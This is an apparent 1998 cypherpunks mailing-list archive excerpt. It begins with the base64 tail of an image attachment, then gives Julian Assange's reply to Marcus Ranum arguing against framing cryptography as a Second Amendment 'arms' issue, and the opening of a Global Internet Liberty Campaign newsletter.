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

------=_NextPart_000_0072_01BD5AA5.83C87CA0--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Sat, 28 Mar 1998 08:42:53 -0800 (PST)
To: "Marcus J. Ranum" <mjr@nfr.net>
Subject: NRA support for crypto [was Rivest's Wheat & Chaff - A crypto alternative]
In-Reply-To: <3.0.3.32.19980323132339.006a03e4@mail.clark.net>
Message-ID: <wxafaan4vw.fsf_-_@polysynaptic.iq.org>
MIME-Version: 1.0
Content-Type: text/plain


"Marcus J. Ranum" <mjr@nfr.net> writes:

> >Since when have you been a cryptographer, Marcus?
> 
> Ever since I independently re-invented ROT-12 at the age of 12. :)

I guess that was a bit mean. I'm just not sure one is really a
cryptographer till one is spending the majority of their time doing it
and earning a living (or a lot of respect) due to the quality of the
work produced. i.e dabbling in cryptography != I've made significant
contributions to the state of the art (I know you have made useful
contributions to other parts of the security world). We .... is often
used as a psychological ploy, to convince people the argument that
follows is their own. Given that I strongly disagreed with the
substance of your message, perhaps I took a dislike to the We
.... business a little too eagerly.

> >> Has anyone considered approaching the NRA for support for
> >> cryptography?? If it is a munition, isn't our right to use it
> >> domestically protected under the second amendment, just like
> >> our right to keep and bear arms?
> >
> >Guns are made for killing people. Terrorists use guns. Terrorists
> >kill people. Cryptography is guns. Terrorists use cryptography.
> >Cryptography kills people.  What a fantastic public relations ploy.
> >The genius of it.
> 
> D'uh, that's what FBI is saying already!

So your suggesting putting your weight behind a tactical metaphor of
the FBI? Effectively letting them control the landscape of the debate,
by implanting into the public's minds that guns equal cryptography.

Ok.

You now have a situation where all strong cryptography is out-lawed
(err, when was the last time you purchased a A42 tank cannon?)
domestically, everything requires export permits (wadda ya mean I can't
post my 10 gauge to Zurich without a license?!) and weak cryptography
is exposed to a whole host of restrictions, including key size
limitation (small arms only), speed limitations (it's dangerous to be
able to encrypt too many messages quickly and automatically), usage
registration (1 32 bit 8 round IDEA cipher and 2 40 bit barrel-loaded
RC4's in farmer Jones' bedroom), cooling off periods (can't let people
encrypt on a 'whim), exclusion of un-desirables (you want a crypto
license and you haven't been in the state 3 months/had a psychiatric
illness/were convicted of an offence/are under the age of 21/listen to
NPR?!), necessity (I need that there 56 bit 8 rounder for rabbit
'crypting; I had to encrypt, officer, in a suburban environment - it was
self defence against hardened criminal hackers!).

> Cryptography is a tool for liberty! Cryptography was used to
> save lives in the war! It's been used throughout history by
> freedom loving men and women to fight oppression! It's as
> American as apple pie!

Breaking cryptography saved lives in the war, this is extensively
documented over hundreds of clearly defined cases [see Kahn's epic
work]. How many lives both-sides using cryptography saved is
intangible. I suspect the completely unreal situation of all-sides
having open communications would have saved a truly huge number of
lives.

> >> I will give up one time pad when you pry it from my cold dead
> >> left hand. My rifle will be in my right hand.
> >
> >Tell me this is fabricated Macrus.
> 
> I wrote that. What's your beef? Having a bad hair day or
> something?

<shrug> I honnestly believed you had been done over by D. Vulis there
	for a moment.

Cheers,
Julian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 28 Mar 1998 23:32:21 -0800 (PST)
To: dc-stuff@merde.dis.org
Subject: Global Internet Liberty Campaign Alert 2.4
Message-ID: <199803290731.JAA03918@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



GILC Alert
Volume 2, Issue 4
March 16, 1998

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Welcome to the Global Internet Liberty Campaign Newsletter
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Welcome to GILC Alert, the newsletter of the Global Internet Liberty
Campaign. We are an international organization of groups working for
cyber-liberties, who are determined to preserve civil liberties and
human rights on the Internet.

We hope you find this newsletter interesting, and we very much hope
that you will avail yourselves of the action items in future issues.

